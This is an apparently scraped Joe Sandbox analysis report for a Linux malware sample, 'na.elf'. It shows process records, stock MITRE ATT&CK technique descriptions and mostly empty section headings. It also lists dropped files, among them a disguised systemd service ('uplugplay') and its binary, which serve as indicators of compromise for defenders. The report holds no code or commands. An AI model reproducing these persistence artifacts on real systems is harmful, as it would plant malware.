Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 6464, Parent PID: 1

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6464, Parent PID: 1

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report na.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/CommId

/memfd:snapd-env-generator (deleted)

/usr/lib/systemd/system/uplugplay.service

/usr/sbin/uplugplay

/var/lib/fwupd/gnupg/.#lk0x00005575faa70b80.galassia.6464

/var/lib/fwupd/gnupg/.#lk0x00005599db685b80.galassia.6434

/var/lib/fwupd/gnupg/.#lk0x000055d64eefcb80.galassia.6443

/var/lib/fwupd/gnupg/.#lk0x000055ea7eb5bb80.galassia.6297

/var/lib/fwupd/gnupg/pubring.kbx.tmp

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

System Behavior

Analysis Process: dash PID: 6211, Parent PID: 4331

Linux Analysis Report
na.elf